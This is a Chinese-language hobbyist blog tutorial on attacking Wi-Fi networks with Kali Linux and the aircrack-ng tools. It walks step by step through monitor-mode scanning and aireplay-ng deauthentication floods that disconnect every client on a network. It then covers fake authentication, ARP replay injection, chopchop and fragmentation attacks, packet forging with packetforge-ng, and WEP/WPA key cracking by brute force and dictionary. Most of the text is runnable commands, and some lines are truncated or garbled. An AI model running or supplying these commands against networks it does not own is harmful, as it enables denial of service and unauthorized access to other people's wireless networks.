wifi攻击
前言
无意中看到一篇文章,说的就是deAuth攻击,它可以使指定了wifi下的设备全部掉线,这让我产生了浓厚的兴趣 :grin:,正好如果进行deAuth攻击的话,需要使用kali,我的kali自从下了镜像就没玩过,正好借着这次机会玩一玩。
好了,接下来就简单记录一下,如何使用deAuto攻击,不要用这个干坏事噢:punch:,玩玩还是可以的。
deAuth攻击
简介
Deaulth攻击全称为取消身份验证洪水攻击或验证阻断洪水攻击,通常被简称为Deauth攻击,是无线网络拒绝服务攻击的一种形式。它旨在通过欺骗从AP到客户端单播地址的取消身份验证帧来将客户端转为未关联/未认证的状态。整个网络发送了伪造的取消身份验证报文,从而阻断了合法用户和AP之间的连接。当客户端试图与AP重新建立连接时攻击者还在继续向信道中发送取消身份验证帧,这将导致客户端和AP始终无法重连。
它旨在通过欺骗从AP到客户端单播地址的取消身份验证帧来将客户端转为未关联/未认证的状态。
简单来说就是攻击者伪造取消认证报文帧,模拟AP发包欺骗被攻击者主机,使主机不断断开与AP连接
前提准备
-
虚拟机
Vmware的安装教程有很多,我就不在这里赘述了,可以参考这篇文章
-
kail
网上教如何安装kali的也有很多,可以参看文章
-
无线网卡
无线网卡用于使虚拟机扫描到周围wifi,并发起请求,无线网卡种类很多,最好买3070芯片组 和8187芯片组的大功率无线网卡。
淘宝直接搜索
RT3070L
即可
kail进行deAuth攻击
配置无线网卡
首先将买来的无线网卡插入USB口,并将其连接到虚拟机中
连接完成后,右击打开终端,在终端输入命令,检查网卡是否被成功加载
ifconfig
当看到wlan0
时就可以了,如果没有去尝试换插无线网卡,确保连接到虚拟机中
开启无线网卡
输入命令 启动无线网卡杂合模式,扫描周围网络
airmon-ng start wlan0
开启成功后,再次输入命令,可以看到网卡名称已经被更换为wlan0mon:
ifconfig
扫描wifi
输入命令,展示周围所有wifi
airodump-ng wlan0mon
-
BSSID: wifi路由的 Mac地址, Data 当前wifi数据大小,有数据就表明有人正在使用,你就可以把它作为一个选择了。
-
CH: 信道,后面的攻击要用到。
-
ESSID: wifi的 名字。还有,他的排序是按信号的强弱来排序的,越往上信号越强。
-
PWR: 是强度。
找到你想要攻击wifi对应路由器的MAC码地址,复制下来,这里我选择了自家wifi,ctrl+c
停止扫描
查看wifi详细
输入命令,查看该wifi详情
airodump-ng -c 信道 --bssid 路由器MAC地址 wlan0mon
- 信道: 为上方CH一栏的值
- 路由器MAC地址: 为BSSID一栏值
可以看到我家wifi现在有三台设备连接
攻击
输入命令
aireplay-ng -0 0 -a 路由器的MAC地址 wlan0mon -c 客户端的MAC地址
-
-c 可以指定客户端地址,即指定设备发起攻击,不加-c则会断开所有合法连接(坏笑)
-
-0 参数,上面所示命令的参数是0,则为循环攻击
输入该命令后,我家的设备就全部掉线了。
扩展
关于airodump-ng
的玩法有很多
攻击模式也有很多
-0 Deautenticate 冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARP request。
如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。
aireplay-ng -0 10 –a
【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)
【-a】:设置 ap 的 mac
【-c】:设置已连接的合法客户端的 mac。
如果不设置-c,则断开所有和 ap 连接的合法客户端。
aireplay-ng -3 -b
-h wifi0
注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器
-1 fakeauth count 伪装客户端连接
这种模式是伪装一个客户端和 AP 进行连接。
这步是无客户端的研究学习的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让 AP 接受数据包,必须使自己的网卡和 AP 关联。如果没有关联的话,目标 AP 将忽略所有从你网卡发送的数据包,IVS 数据将不会产生。
用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生 ARP 包。
aireplay-ng -1 0 –e
参数说明:
【-1】:伪装客户端连接模式,后面跟延时
【-e】:设置 ap 的 essid
【-a】:设置 ap 的 mac
【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)
查看无线网卡MAC使用macchanger -s wlan0mon
命令。
aireplay-ng --fakeauth 0 -a 50:2B:73:18:ED:81 -c 00:02:6f:be:66:41 wlan0mon
- –fakeauth delay:伪装一个客户端和AP进行连接,其中delay表示连接的延迟时间。
-2 Interactive 交互模式
这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式
1.这种模式主要用于研究学习无客户端,先用-1 建立虚假客户端连接然后直接发包攻击 ,
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b
-h wifi0
参数说明:
【-2】:交互攻击模式
【-p】:设置控制帧中包含的信息(16 进制),默认采用 0841
【-c】:设置目标 mac 地址
【-b】:设置 ap 的 mac 地址
【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)
2.提取包,发送注入数据包 aireplay-ng -2 –r <file> -x 1024 wifi0
发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择 1024。
-3 ARP-request 注入攻击模式
这种模式是一种抓包后分析重发的过程 这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客户端那一般需要等几分钟,让合法客户端和 ap 之间通信,少量数据就可产生有效 ARP request 才可利用-3模式注入成功。如果没有任何通信存在,不能得到 ARP request.,则这种攻击就会失败。
如果合法客户端和ap之间长时间内没有 ARP request,可以尝试同时使用-0 攻击. 如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生有效 ARP request。再通过-3 模式注入。
aireplay-ng -3 -b
-h -x 512 wifi0
参数说明:
【-3】:arp 注入攻击模式
【-b】:设置 ap 的 mac
【-h】:设置
【-x】:定义每秒发送数据户包的数量,但是最高不超过 1024,建议使用 512(也可不定义)
aireplay-ng --arpreplay -b 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
-4 Chopchop 攻击模式
用以获得一个包含密钥数据的 xor 文件 这种模式主要是获得一个可利用包含密钥数据的 xor 文件,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。
aireplay-ng -4 -b
-h wifi0 参数说明:
【-b】:设置需要研究学习的 AP 的 mac
【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)
aireplay-ng --chopchop -a 50:2B:73:18:ED:81 -h 00:02:6F:BE:66:41 wlan0mon
然后使用Packetforge-ng(网络数据包伪造工具)伪造数据包,packetforge-ng使用方法如下:
packetforge-ng
packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y replay-1219-232225.xor -w chopchop-packet
-
-0,–arp:伪造一个arp的数据包
-
-l <ip[:port]> : 设置源IP地址和端口
-
-k <ip[:port]> : 设置目标IP地址和端口
-
-y
: 从指定文件读取PRGA(wep加密中间量)
aireplay-ng -2 -r chopchop-packet wlan0mon
-
-2,–interactive : 交互式帧选择
-
-r
: 从pcap文件中提取数据包
aircrack-ng chopchop-01.cap
-5 fragment 碎片包攻击模式
用以获得 PRGA(包含密钥的后缀为 xor 的文件) 这种模式主要是获得一个可利用 PRGA,这里的 PRGA 并不是 wep key 数据,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标 AP 重新广播包,当 AP 重广播时,一个新的 IVS 将产生,我们就是利用这个来研究学习 !
aireplay-ng -5 -b
-h wifi0
【-5】:碎片包攻击模式
【-b】:设置 ap 的 mac
【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)
Packetforge-ng:数据包制造程序 Packetforge-ng
【-0】:伪造 ARP 包
packetforge-ng -0 -a
-h wifi0 –k 255.255.255.255 -l 255.255.255.255–y<.xor file> -w mrarp
参数说明:
【-0】:伪装 arp 数据包
【-a】:设置 ap 的 mac
【-h】设置虚拟伪装连接的 mac(即自己的 mac)
【-k】<ip[:port]>说明:设置目标文件 IP 和端口
【-l】<ip[:port]>说明:设置源文件 IP 和端口
【-y】
【-w】设置伪装的 arp 包的文件名 Aircrack-ng:WEP 及 WPA-PSK key 研究学习主程序
Aircrack-ng [optin] <.cap/.ivs file>Optin aircrack-ng -n 64 -b
name-01.ivs )
参数说明:
【-n】:设置 WEP KEY 长度(64/128/152/256/512)aircrack-ng -x -f 2 name-01h.cap
参数说明:
【-x】:设置为暴力研究学习模式
【-f】:设置复杂程度,wep 密码设置为 1,wpa 密码设置为 2 aircrack-ng -w password.txt ciw.cap
【-w】:设置为字典研究学习模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到 WPA 验证的抓包文件。
aireplay-ng --fragment -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 wlan0mon
packetforge-ng -0 -a 50:2B:73:18:ED:81 -c 00:02:6F:BE:66:41 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1219-232225.xor -w fargment-packet
aireplay-ng -2 -r fragment-packet wlan0mon
aircrack-ng fragment-01.cap